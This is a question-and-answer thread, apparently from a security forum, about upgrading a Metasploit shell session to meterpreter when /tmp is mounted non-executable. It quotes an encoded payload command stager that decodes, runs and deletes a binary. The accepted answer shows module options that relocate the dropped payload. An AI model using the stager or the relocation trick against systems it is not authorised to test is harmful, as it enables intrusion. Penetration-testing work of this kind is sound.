# How to set where the meterpreter payload is placed on the victim machine in metasploit?

Tags: metasploit, meterpreter

### Background

I am trying to achieve a meterpreter session on a test machine (the "victim") that I already have a shell session on. When I run the command `sessions -u #`, where `#` corresponds to the number of the shell session, I receive an error because metasploit tries to create and execute a payload on the victim in the `/tmp` directory, which is set to be **non-executable**. In other words, nothing can be executed from the `/tmp` directory on the victim machine.

### Question

**Is there a way for me to specify where this executable file is created and executed on the victim machine?**

- My goal is to achieve something like this:

  - Use the `linux/x86/meterpreter/bind_tcp` payload.
  - Instead of having the executable payload be placed in `/tmp` and called something random such as `abc123`, I would want to have the payload placed in a known location that allows execution such as `/home/Bob`.
  - The executable payload whose location we specified, `/home/Bob/abc123`, will then execute and start the meterpreter session.

#### Notes

- I believe to do this it has something to do with modifying the "command stager". In the following link you can see this line:

```
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysHIABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/FgFBP.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/tDGmH' < '/tmp/FgFBP.b64' ; chmod +x '/tmp/tDGmH' ; '/tmp/tDGmH' ; rm -f '/tmp/tDGmH' ; rm -f '/tmp/FgFBP.b64'"]
```

- Note the execution of the `/tmp/tDGmH` file toward the end of the command... This is the part of the command that is failing for me due to the `/tmp` directory being set to non-executable.

  - Link: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/webmin_backdoor.md
- Could possibly involve making changes to this file: https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/bourne.rb

Answer (score 1, accepted):

The `sessions -u` is actually a [`post/multi/manage/shell_to_meterpreter`](https://www.rapid7.com/db/modules/post/multi/manage/shell_to_meterpreter) with predefined options. If you see the advanced options for that module (with `show advanced`), you should notice it has:

> ```
> Name               Required   Description
> ----               --------   -----------
> BOURNE_FILE        no         Remote filename to use for dropped binary
> BOURNE_PATH        no         Remote path to drop binary
> PAYLOAD_OVERRIDE   no         Define the payload to use
> ```

Therefore, what you are trying to do should be possible with:

```
use post/multi/manage/shell_to_meterpreter
set SESSION 2
set BOURNE_PATH /home/Bob
set PAYLOAD_OVERRIDE linux/x86/meterpreter/bind_tcp
run
```

Comment: I can not believe this worked!!! You have no idea how long I spent trying to figure this out. I am getting a core dump when I run my payload now, but your answer worked to change the filename, file path, and payload type. Thank you very much.

Comment: Glad you found this helpful Metasploit is a huge framework used by so many that things like this are usually thought through already. It's modular and scriptable.